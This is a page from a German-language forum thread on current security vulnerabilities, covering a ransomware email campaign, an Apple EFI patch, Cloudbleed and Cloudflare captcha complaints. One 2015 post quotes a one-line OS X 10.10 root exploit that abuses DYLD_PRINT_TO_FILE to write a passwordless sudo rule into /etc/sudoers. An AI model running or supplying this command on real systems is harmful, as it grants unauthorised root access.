Aktuelle Sicherheitslücken - Seite 6

Seite 6 von 48 - Forum: Applications, Apps & Drivers auf overclockers.at

URL: https://www.overclockers.at/applications/aktuelle-sicherheitsluecken_238671/page_6 - zur Vollversion wechseln!


mr.nice. schrieb am 26.06.2015 um 10:58

Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/


noir schrieb am 26.06.2015 um 13:13

naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht


mr.nice. schrieb am 01.07.2015 um 13:30

Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934


Luka schrieb am 22.07.2015 um 11:37


So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com


Luka schrieb am 27.07.2015 um 21:44


wergor schrieb am 20.12.2016 um 14:40


Lord Wyrm schrieb am 24.02.2017 um 11:37

Cloudbleed





Wiedermal Zeit für nen Passwortwechsel...


Rektal schrieb am 24.02.2017 um 12:06

Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:


COLOSSUS schrieb am 24.02.2017 um 12:18

¯\_(ツ)_/¯


Obermotz schrieb am 24.02.2017 um 12:55

Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..


Smut schrieb am 24.02.2017 um 14:27

in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.


Obermotz schrieb am 24.02.2017 um 14:50

Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch ;)


wergor schrieb am 24.02.2017 um 15:37

Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.
mit tor gibts auch ständig captcha abfragen. nervt leider :(

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.
true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/


Smut schrieb am 24.02.2017 um 15:50

das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.


wergor schrieb am 24.02.2017 um 18:25

das ist mir schon klar. nervt aber trotzdem ;)




overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2024